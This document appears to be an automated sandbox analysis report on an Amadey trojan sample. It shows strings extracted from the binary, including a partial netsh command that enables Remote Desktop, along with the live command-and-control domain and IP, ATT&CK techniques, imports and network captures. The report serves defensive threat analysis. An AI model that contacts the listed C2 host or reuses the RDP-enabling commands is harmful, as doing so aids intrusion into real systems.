Source: 6uHfmjGMfL.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	34 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6uHfmjGMfL.exe	56%	Virustotal		Browse
6uHfmjGMfL.exe	63%	ReversingLabs	Win32.Trojan.Amadey
6uHfmjGMfL.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://clientservices.sgoogleapis.observer/api/index.phpserver	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.php	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.php6o	0%	Avira URL Cloud	safe
clientservices.sgoogleapis.observer/api/index.php	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.php8	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.phpK	0%	Avira URL Cloud	safe
http://clientservices.sgoogleapis.observer/api/index.php;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
clientservices.sgoogleapis.observer	104.21.80.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://clientservices.sgoogleapis.observer/api/index.php	true	Avira URL Cloud: safe	unknown
clientservices.sgoogleapis.observer/api/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://clientservices.sgoogleapis.observer/api/index.php;	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://clientservices.sgoogleapis.observer/api/index.phpK	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://clientservices.sgoogleapis.observer/api/index.phpk	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://clientservices.sgoogleapis.observer/api/index.php8	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://clientservices.sgoogleapis.observer/api/index.php6o	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://clientservices.sgoogleapis.observer/api/index.phpserver	6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	clientservices.sgoogleapis.observer	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585768
Start date and time:	2025-01-08 08:43:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6uHfmjGMfL.exe renamed because original name is a hash value
Original Sample Name:	89796a9b6072d2334db09c8b41a64c57.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 19 Number of non-executed functions: 93
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:43:54	API Interceptor	9399623x Sleep call for process: 6uHfmjGMfL.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://mitra-led.com/	Get hash	malicious	Unknown	Browse	104.21.96.1
	YOUR TV LICENCE STATEMENT.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.flamingoblv.com/bdAHAKrXFqXFQCYuPG6x8vSTVrU9FI7svGtQIOtbZGb5Zz82nKKGDoG-o7UnwphbBQK1zePMgTPfELKVecsIqQ~~	Get hash	malicious	Unknown	Browse	172.67.160.100
	https://www.overflix.gay/ksisjep	Get hash	malicious	Unknown	Browse	104.21.76.17
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	3.elf	Get hash	malicious	Unknown	Browse	1.4.26.56
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=evsqlwgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#test@kghm.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://plnbl.io/review/VdCYQSoKp54z	Get hash	malicious	HTMLPhisher	Browse	104.22.54.104
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse	104.21.36.11
	https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfad	Get hash	malicious	Unknown	Browse	104.18.95.41

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.473090379332284
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6uHfmjGMfL.exe
File size:	444'928 bytes
MD5:	89796a9b6072d2334db09c8b41a64c57
SHA1:	bb0e78329ec39982aa2b3b4064375a534170aa43
SHA256:	c847c70bdc3eecede3b89f4d7c88ad538271ea92fcfc3e6bb2ea6e22b83d4d61
SHA512:	22469f8af6b39e08f12ce243b5114ade233dc68bb6aea126ced1b4d1d419c5923f37426c5fe436f66c086c4fce088aa7b9f83613a4bfcda06cf6ffe5920f59dd
SSDEEP:	12288:l6BzKWxAlmQVUhMbQiLlh1FPMdkU9rTXl0ux:jlmLQpBM+Uz3x
TLSH:	C5944B207917D032D52191B11FADFFF195ADB9269B710ADB7BC00E366A201E36A31F39
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........BS..,...,...,.../...,...).#.,...(...,.../...,...)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x42a107
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5E944E30 [Mon Apr 13 11:34:08 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	407b29a1346b818a12b66f58555063ce

Entrypoint Preview

Instruction
call 00007FE7D4DA8B9Bh
jmp 00007FE7D4DA83C9h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FE7D4DA7C36h
jmp 00007FE7D4DA8532h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x64580	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6e000	0x45c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5e1ec	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5e300	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5e228	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x33c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4f23a	0x4f400	3f586b812b415068f12e112d05eb0bf5	False	0.47701843454258674	data	6.518721209760155	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x14890	0x14a00	e2fabb6dad8685ca5173f7adf297e02c	False	0.4822679924242424	data	5.329370107979886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x66000	0x6ddc	0x2c00	722b6870b0cee64fdefc234f5adaca0b	False	0.14923650568181818	data	3.3090615649832866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d000	0x1e0	0x200	4a05bbd64487346fb2d65a9ea12c5f5e	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6e000	0x45c8	0x4600	fdf114b854bd3eb1290026b9dc2a7280	False	0.7024553571428571	data	6.628631376053393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
sqaf	0x73000	0x2000	0x1400	170fe67a5900a37ccfc06b15c468cbb3	False	0.386328125	Targa image data - Map 32512 x 4096 x 32 +32352 +4096 - 15-bit alpha - top - right - interleave ""	4.281713625079622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6d060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesA, Process32NextW, CreateFileA, Process32FirstW, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, GetLastError, RemoveDirectoryA, ReadProcessMemory, CreateProcessA, CreateDirectoryA, SetThreadContext, SetEndOfFile, HeapSize, GetProcessHeap, SetEnvironmentVariableW, Wow64RevertWow64FsRedirection, GetTempPathA, Sleep, CreateToolhelp32Snapshot, OpenProcess, SetCurrentDirectoryA, GetModuleHandleA, ResumeThread, GetComputerNameExW, GetVersionExW, WaitForSingleObject, CreateMutexA, FindClose, PeekNamedPipe, CreatePipe, FindNextFileA, VirtualAlloc, Wow64DisableWow64FsRedirection, WriteFile, VirtualFree, FindFirstFileA, SetHandleInformation, WriteProcessMemory, GetModuleFileNameA, VirtualAllocEx, ReadFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetTimeZoneInformation, HeapReAlloc, ReadConsoleW, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileType, GetFileInformationByHandle, GetDriveTypeW, CreateFileW, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObjectEx, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, WriteConsoleW
USER32.dll	GetSystemMetrics, ReleaseDC, GetDC
GDI32.dll	CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, DeleteObject, BitBlt
ADVAPI32.dll	RevertToSelf, RegCloseKey, RegQueryInfoKeyW, RegGetValueA, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, CreateProcessWithTokenW, LookupAccountNameA, ImpersonateLoggedOnUser, RegSetValueExA, OpenProcessToken, RegOpenKeyExA, RegEnumValueA, DuplicateTokenEx, GetSidIdentifierAuthority
SHELL32.dll	SHGetFolderPathA, ShellExecuteA, SHFileOperationA
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize
WININET.dll	HttpOpenRequestA, InternetWriteFile, InternetOpenUrlA, InternetOpenW, HttpEndRequestW, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpSendRequestA, InternetConnectA, InternetReadFile
gdiplus.dll	GdiplusStartup, GdipSaveImageToFile, GdipGetImageEncodersSize, GdiplusShutdown, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipDisposeImage
WS2_32.dll	closesocket, inet_pton, getaddrinfo, WSAStartup, send, socket, connect, recv, htons, freeaddrinfo

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T08:44:05.634067+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49708	104.21.80.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 08:43:56.085689068 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:56.090498924 CET	80	49704	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:56.090567112 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:56.091411114 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:56.096227884 CET	80	49704	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:56.733007908 CET	80	49704	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:56.733072996 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.241086960 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.241303921 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.246130943 CET	80	49705	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:58.246148109 CET	80	49704	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:58.246248960 CET	49704	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.246257067 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.246392965 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:43:58.251651049 CET	80	49705	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:58.904522896 CET	80	49705	104.21.80.1	192.168.2.5
Jan 8, 2025 08:43:58.904629946 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.522114992 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.522384882 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.527189016 CET	80	49706	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:00.527219057 CET	80	49705	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:00.527333021 CET	49705	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.527374029 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.527575016 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:00.532377005 CET	80	49706	104.21.80.1	192.168.2.5
